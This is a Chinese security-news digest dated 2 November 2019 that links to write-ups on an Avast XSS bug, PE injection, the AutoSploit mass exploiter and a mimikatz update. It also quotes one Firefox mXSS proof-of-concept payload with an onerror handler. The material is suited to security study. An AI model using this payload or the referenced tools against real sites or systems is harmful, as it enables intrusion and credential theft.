专栏首页鸿鹄实验室安全问题(2019年11月2日)

安全问题(2019年11月2日)

问题

1、5,000 USD XSS Issue at Avast Desktop AntiVirus for Windows (Yes, Desktop!)

https://medium.com/bugbountywriteup/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968

2、Firefox mXSS

payload:

<svg<b<style<imgid="&lt;/style&gt;&lt;imgsrc=1onerror=alert(1)&gt;">

3、PE Injection: Executing PEs inside Remote Processes

https://ired.team/offensive-security/code-injection-process-injection/pe-injection-executing-pes-inside-remote-processes

4、AutoSploit v4.0 - Automated Mass Exploiter

https://www.kitploit.com/2019/10/autosploit-v40-automated-mass-exploiter.html

5、updated mimikatz 2.1 to 2.2 latest (31 oct 2019)

fixed VirtualAlloc issues on Win 10 version 1903 build 18362

https://github.com/PowerShellMafia/PowerSploit/pull/336

更多资讯 请关注 鸿鹄实验室↓↓↓

本文分享自微信公众号 - 鸿鹄实验室(gh_a2210090ba3f),作者:鸿鹄实验室

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-11-02

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 每日安全简讯 2019年2月11日 周一

    3. Cisco Meeting Server CVE-2019-1678拒绝服务漏洞

    UbranGames
  • 国内外安全技术分享(2019年11月11日)

    https://ijustwannared.team/2019/11/07/c2-over-rdp-virtual-channels/

    鸿鹄实验室
  • 国内外安全技术分享(2019年11月4日)

    1、 ownCloud 10.3.0 stable - Cross-Site Request Forgery

    鸿鹄实验室
  • 国内外安全技术分享(2019年11月18日)

    https://sploitus.com/exploit?id=EDB-ID:47524

    鸿鹄实验室
  • 国内外安全技术分享(2019年11月7日)

    https://blog.xpnsec.com/protecting-your-malware/

    鸿鹄实验室
  • 国内外安全技术分享(2019年11月13日)

    https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

    鸿鹄实验室
  • 国内外安全技术分享(2019年11月8日)

    https://packetstormsecurity.com/files/155163/RHSA-2019-3706-01.txt

    鸿鹄实验室
  • 2019年11月2日:总结iOS技术面试题及应对答案

    随着移动互联网技术的不断发展和创新,访谈对于公司和开发人员和设计师来说都是费时且昂贵的项目,面对iOS开发者和设计师在访谈过程中可能遇到的问题,现在为大家总结i...

    iOSSir
  • 常用JS正则大全(2019年9月2日更新)

    8月2日新增vscode插件, 查正则不用来回切换了, vscode中搜索"any-rule"

    铁皮饭盒
  • 盘点Kafka从0.11.3到2.4.1的一些亮点【知识笔记】

    本文盘点下到Kafka 2.4.1版本以来的一些亮点,这些亮点或笔者实际中踩过的坑、或可能将来会在实践中使用、或个人关注的,点击官方发布日志连接查看全貌。

    瓜农老梁
  • 设计模式《单例设计模式》

    梅花
  • iCDO一周要闻:中国有哪些全球百大AI公司;智能家居收集大量用户数据;99%安卓手机存在漏洞等

    中国公司和其他实体渴望在国际上引起人们的注意,这出人意料地使中国成为Facebook最大的广告收入来源之一。有数据显示,Meet Social(Facebook...

    iCDO互联网数据官
  • 腾讯网络安全T-Star高校挑战赛 正式启动!!!

    ? ? T-Star大赛简介 ? “腾讯网络安全T-star高校挑战赛”由腾讯安全应急响应中心(TSRC)与腾讯高校合作联合发起,覆盖全国二十余所高等院校的...

    腾讯高校合作
  • java入门踩的坑2 【数据库快速入门】2019年8月11日

    版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

    韩旭051
  • iCDO一周要闻:广告收入,字节跳动超百度;谷歌被曝收集健康数据;首届5G大会在京举行

    据外媒报道,捷克政府周一批准了一项7%的数字税提案,旨在通过对谷歌和Facebook等全球互联网巨头的广告服务征税来增加国库收入。

    iCDO互联网数据官
  • iCDO一周要闻:618京东天猫相关数据;微信将对违规外挂处罚;百度旅游6月底停止服务等

    6月18日 QuestMobile:2019年4月中国移动互联网月活规模首次连续2个月环比下跌

    iCDO互联网数据官
  • 警示2018:那些值得在年底彻查和回顾的数据库事件

    2018即将离我们远去,回顾一下这一年中关于数据库方面未了之事,值得在年终岁末再检查一次、考虑一下的技术点,列在这里,给大家参考:

    数据和云
  • 我家大门常打开,“开放”门锁等黑客?

    如果你使用了智能门锁,并且使用的是August smart lock Pro + Connect的话,请注意,该门锁中未打补丁的安全漏洞,意味着黑客可以完全访问...

    FB客服
  • 亚马逊抢甲骨文的 Java 饭碗,推出 Corretto

    14 日亚马逊发文宣布 Amazon Corretto 的预览版,这是一个免费的、跨平台生产就绪的 OpenJDK 发行版。

    芋道源码

扫码关注云+社区

领取腾讯云代金券